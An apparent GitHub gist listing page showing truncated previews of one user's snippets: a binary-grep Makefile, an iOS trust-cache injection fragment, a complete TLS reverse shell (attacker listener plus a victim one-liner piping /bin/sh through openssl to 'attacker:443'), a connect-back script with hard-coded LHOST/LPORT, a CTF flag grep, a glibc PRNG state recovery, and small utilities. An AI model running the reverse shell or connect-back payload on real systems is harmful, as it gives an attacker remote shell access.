gteissier / Makefile
Last active October 17, 2018 14:23
Binary grep in four flavours: Python re, C Knuth-Morris-Pratt, C memmem, and a Ragel-generated scanner. Rough performance ranking: the Ragel version is the fastest, memmem the slowest.
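CFLAGS=-g -O2

# Builds the three C binary-grep implementations side by side so they can be
# benchmarked against each other: `make` (or `make all`) produces bgrep-ragel,
# bgrep-kmp and bgrep-memmem.
#
# Each binary is a proper target with its own prerequisites, so only the
# pieces whose inputs changed are rebuilt and a missing source file (the
# original rule never listed bgrep-memmem.c) is reported by make itself.
.PHONY: all clean
all: bgrep-ragel bgrep-kmp bgrep-memmem

# Ragel emits the C scanner; -G2 selects goto-driven code (fastest, largest).
bgrep-ragel.c: bgrep-ragel.rl
	ragel -C -G2 -o $@ $<

# The generated scanner may define tables it never reads; silence only that
# warning, and only for the generated file.
bgrep-ragel.o: bgrep-ragel.c
	gcc -Wno-unused-const-variable $(CFLAGS) -c $< -o $@

bgrep-kmp.o: bgrep-kmp.c
	gcc $(CFLAGS) -c $< -o $@

bgrep-memmem.o: bgrep-memmem.c
	gcc $(CFLAGS) -c $< -o $@

# One link rule for all three: each binary is a single object file.
bgrep-ragel bgrep-kmp bgrep-memmem: %: %.o
	gcc -o $@ $<

clean:
	rm -f bgrep-ragel.c bgrep-ragel.o bgrep-kmp.o bgrep-memmem.o bgrep-ragel bgrep-kmp bgrep-memmem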
// iPhone11,2-4-6
void inject_trusts(int pathc, const char *paths[])
{
printf("[+] injecting into trust cache...\n");
extern uint64_t g_kern_base;
static uint64_t tc = 0;
if (tc == 0) {
// loaded_trust_caches: 0xFFFFFFF008F702C8
gteissier / cmd.sh
Last active April 9, 2024 09:46
TLS reverse shell
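# attacker side: create a self-signed certificate and set up a listener.
# A throwaway self-signed certificate is enough because the only party that
# needs to trust it is the victim command below; -nodes leaves the private
# key unencrypted so s_server can load it without a passphrase prompt.
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# -quiet hides the handshake chatter so only the shell's I/O is relayed.
openssl s_server -quiet -key key.pem -cert cert.pem -port 443
# victim side: connect back to attacker using TLS.
# s_client does NOT verify the server certificate by default: without the two
# -verify* options the channel is encrypted but unauthenticated, and whoever
# can redirect "attacker:443" (DNS, routing, an inline interceptor) receives
# the shell instead of the listener. -CAfile pins the listener's own cert.pem
# (stage it on the victim first) and -verify_return_error aborts the
# handshake on mismatch; drop both only if the cert cannot be staged.
# The fifo is created in a private mktemp directory instead of the current
# directory so a pre-existing "fifo" entry cannot be clobbered or reused.
d=$(mktemp -d); mkfifo "$d/fifo"; /bin/sh -i < "$d/fifo" 2>&1 | openssl s_client -quiet -connect attacker:443 -verify_return_error -CAfile cert.pem > "$d/fifo"; rm -rf "$d"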
gteissier / ber.py
Last active April 29, 2021 15:56
ASN.1 BER decoder
from cStringIO import StringIO
from struct import pack
from binascii import unhexlify, hexlify
from itertools import count, dropwhile
# Module-wide switch for diagnostic output while decoding. Its readers are
# further down the file (outside this preview) -- presumably they print the
# tag/length/value of each frame as it is parsed; confirm before relying on it.
VERBOSE = True
class Asn1Obj:
'''generic frame for ASN1 fields, supports nesting'''
def __init__(self, klass, constructed, type, indefinite, value=None, children=[], absorbed=None):
gteissier / mass-webshot.py
Created April 26, 2019 07:28
Take web screenshots
#!/usr/bin/env python
from selenium import webdriver
import selenium
import sys
import re
def take_screenshot(url, png):
options = webdriver.ChromeOptions()
options.add_argument('headless')
gteissier / asciinema_rebase.py
Created April 29, 2019 04:19
Asciinema now stores timestamps relative to the start of the capture. To skip the beginning of a capture, the remaining timestamps must be offset by the timestamp of the first frame that is kept.
#!/usr/bin/env python
import sys
import json
start_time = None
for line in sys.stdin.readlines():
o = json.loads(line)
if type(o) != type([]):
#!/usr/bin/env python
import requests
import sys
from base64 import b64encode
# Callback address for the connect-back: LHOST/LPORT follow the usual
# listener-host/listener-port naming, and both are hard-coded here, so edit
# them before use. Presumably they are embedded in the base64-encoded payload
# that the rest of the script (outside this preview) sends with requests --
# TODO confirm against the code below.
LHOST = '172.16.89.1'
LPORT = 8888
gteissier / pygrep.py
Created May 10, 2019 09:29
Look for the FLAG[0-9a-zA-Z/+=]+ pattern everywhere, even inside a jar contained in a zip contained in an ear (nested archives are opened recursively).
#!/usr/bin/env python
import os
import re
import zipfile
from cStringIO import StringIO
def process_file(f):
data = f.read()
for m in re.finditer(r'(FLAG[0-9a-zA-Z/+=]+)', data):
gteissier / compute-internal-state.py
Created September 4, 2019 11:50
glibc random() derandomization: reconstruct the TYPE_3 PRNG's internal state with z3
#!/usr/bin/env python
import z3
import sys
# glibc default PRNG
# it is called TYPE_3, and is an additive recursive generator
# its internal state is made of 31 32-bit integers
# r_0 ... r_30
# each call to random will modify the internal state
gteissier / tcpdump.py
Created December 14, 2019 15:19
Pythonic tcpdump: copy, paste, and enjoy
#!/usr/bin/env python
'''
It has been tested with both py2 and py3.
Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK
or the memory mapped ring buffer.
BPF filter listed below is compiled form of "not port 22"
if you want to change it, do something like